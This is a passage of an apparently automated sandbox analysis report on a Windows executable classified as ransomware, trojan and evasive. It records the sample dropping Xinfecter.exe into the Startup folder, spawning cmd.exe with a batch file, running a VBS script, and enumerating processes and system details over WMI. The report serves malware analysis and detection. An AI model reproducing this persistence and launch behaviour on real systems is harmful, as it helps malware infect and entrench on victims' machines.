      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A7BA600_2_00A7BA60
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE3C700_2_00AE3C70
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB3E800_2_00AB3E80
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD7FA00_2_00AD7FA0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0003404948_2_00034049
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0003C17048_2_0003C170
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002467048_2_00024670
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005008048_2_00050080
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0008411048_2_00084110
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000781A048_2_000781A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002824048_2_00028240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005A2C048_2_0005A2C0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A42D448_2_000A42D4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000762EB48_2_000762EB
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002838048_2_00028380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000623C048_2_000623C0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007844048_2_00078440
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000205AA48_2_000205AA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007674648_2_00076746
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007C7C548_2_0007C7C5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002E83048_2_0002E830
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000848D048_2_000848D0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000CE90D48_2_000CE90D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000269E048_2_000269E0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A6A5848_2_000A6A58
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00018A8048_2_00018A80
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000E0B0448_2_000E0B04
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00084B7048_2_00084B70
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00050E0048_2_00050E00
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A8E4A48_2_000A8E4A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00058E9048_2_00058E90
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007CF3F48_2_0007CF3F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002AF5048_2_0002AF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074FA748_2_00074FA7
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074FB448_2_00074FB4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B8FE048_2_000B8FE0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B925248_2_000B9252
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000192A048_2_000192A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000612A048_2_000612A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007D2C648_2_0007D2C6
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005330048_2_00053300
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0001533048_2_00015330
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007533B48_2_0007533B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005540048_2_00055400
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007D55748_2_0007D557
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002F57048_2_0002F570
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C35A348_2_000C35A3
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B95C448_2_000B95C4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0009F5F048_2_0009F5F0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005163048_2_00051630
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C37D248_2_000C37D2
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000BB81748_2_000BB817
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B986E48_2_000B986E
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0008386048_2_00083860
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000D987948_2_000D9879
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0008990848_2_00089908
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007D99048_2_0007D990
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0001BA6048_2_0001BA60
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0001DAB048_2_0001DAB0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00029ABA48_2_00029ABA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00025AC048_2_00025AC0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A3AE548_2_000A3AE5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002DAF048_2_0002DAF0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B9B3548_2_000B9B35
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000D1B7148_2_000D1B71
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00021B7F48_2_00021B7F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00083C7048_2_00083C70
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00075C8448_2_00075C84
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C9CD048_2_000C9CD0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B9DF048_2_000B9DF0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C7E4648_2_000C7E46
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00053E8048_2_00053E80
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00075EA848_2_00075EA8
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00077FA048_2_00077FA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Code function: String function: 000A15B1 appears 83 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Code function: String function: 00041BD0 appears 69 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Code function: String function: 000A1B70 appears 64 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Code function: String function: 00041940 appears 31 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Code function: String function: 00049B40 appears 64 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Code function: String function: 000480D0 appears 33 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Code function: String function: 000A157D appears 186 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Code function: String function: 0004B8D0 appears 48 times
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: String function: 00B015B1 appears 83 times
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: String function: 00B00C3C appears 68 times
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: String function: 00AA9B40 appears 64 times
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: String function: 00AA80D0 appears 33 times
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: String function: 00AAB8D0 appears 48 times
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: String function: 00B01B70 appears 69 times
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: String function: 00B0157D appears 186 times
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: String function: 00AA1BD0 appears 69 times
Source: BiXS3FRoLe.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.rans.troj.adwa.evad.winEXE@118/19@1/2
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: 0_2_00A85920 PathIsNetworkPathA,__alloca_probe_16,MultiByteToWideChar,GetDiskFreeSpaceExW
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
Source: BiXS3FRoLe.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="8036"::GetOwner
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="8036"::GetOwner
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="552"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="620"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="628"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="924"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="984"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="360"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="356"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="772"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="792"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1040"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1092"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1108"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1172"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1216"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1332"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1372"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1416"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1444"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1460"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1576"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1584"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1640"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1652"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1712"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1796"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1804"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1928"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1936"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1944"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2012"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1980"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2052"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2060"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2132"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2184"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2320"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2328"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2364"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2396"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2412"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2488"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2508"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2516"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2532"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2644"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2688"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2856"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="968"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3616"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3628"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3676"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3900"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4260"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4436"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4468"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4572"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4612"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6592"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6752"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6572"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2440"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5352"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6692"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5356"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5888"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7516"::GetOwner
